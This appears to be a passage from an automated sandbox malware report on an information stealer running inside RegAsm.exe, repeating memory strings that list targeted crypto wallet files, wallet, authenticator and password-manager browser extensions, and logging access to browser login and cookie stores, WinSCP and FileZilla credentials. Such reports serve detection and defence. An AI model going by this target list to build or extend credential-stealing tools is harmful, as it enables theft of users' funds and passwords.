Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\\Coinomi\Coinomi\wallets\\*.config
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
